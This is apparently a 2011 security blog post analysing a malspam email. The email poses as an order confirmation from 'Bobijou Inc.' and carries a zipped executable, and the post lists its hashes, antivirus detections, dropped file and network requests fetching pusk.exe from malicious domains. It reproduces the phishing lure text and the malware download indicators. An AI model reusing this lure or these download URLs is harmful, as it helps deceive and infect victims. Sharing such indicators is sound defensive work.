Wednesday, April 27th, 2011 / 3,725 views

Malware: Successfull Order 386284

Block unknown processes with NoVirusThanks EXE Radar Pro

   

Another suspicious email spreading malware:

Received: from [246.236.108.228] (helo=waeztfotlyzjd.jxokxslnvzq.org)
From: " Bobijou Inc" <premierednxez86@expdel.com>
Subject: Successfull Order 386284
Return-Path: <premierednxez86@expdel.com>

Message:

Thank you for ordering from Bobijou Inc.
 
This message is to inform you that your order has been received and is currently
being processed.
 
Your order reference is 061042.
You will need this in all correspondence.
 
This receipt is NOT proof of purchase.
We will send a printed invoice by mail to your billing address.
 
You have chosen to pay by credit card.
Your card will be charged for the amount of 244.00 USD and “Bobijou Inc.” will
appear next to the charge on your statement.
 
You will receive a separate email confirming your order has been despatched.
 
Your purchase and delivery information appears below in attached file.
 
Thanks again for shopping at Bobijou Inc.

Attached there is a file without extension:

Report date: 2011-04-27 11:18:14 (GMT 1)
File name: order-details
File size: 6321 bytes
MD5 hash: 50b3029c2c9140459207da38d5bac01b
SHA1 hash: 42bc94f02910a21d44386a673977fe7f100cf07c
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 27/04/2011 10.0.0.1190 Generic22.TSN
Avira AntiVir 27/04/2011 7.11.7.12 TR/Kazy.20399
Emsisoft 27/04/2011 5.1.0.2 Backdoor.Win32.Hostil!IK

The file is ZIP compressed and it contains an executable file:

Report date: 2011-04-27 11:23:31 (GMT 1)
File name: order-details-exe
File size: 18432 bytes
MD5 hash: 60ca989549d4dc3be9fe80a1004ada72
SHA1 hash: 328d80999b079b627f343eec38d366f1aea705c3
Detection rate: 3 on 6 (50%)
Status: INFECTED

AVG 27/04/2011 10.0.0.1190 Generic22.TSN
Avira AntiVir 27/04/2011 7.11.7.12 TR/Kazy.20399
Emsisoft 27/04/2011 5.1.0.2 Backdoor.Win32.Hostil!IK

The malware creates following files:

%Temp%\pusk.exe (7EAA0888FCEDB00A587D7B419D219D5A)

Network traffic:

GET /pusk.exe HTTP/1.1
Host: variantov. com
 
GET /f/g.php HTTP/1.1
Host: kkojjors. net

URLVoid domain analysis:

http://www.urlvoid.com/scan/variantov.com
http://www.urlvoid.com/scan/kkojjors.net

Posted by admin on Wednesday, April 27th, 2011 at 9:37 am and filed under Security with tags , , . You can skip to the end and leave a response. Pinging is currently not allowed.

Related Articles

Leave a Reply

Just another WordPress site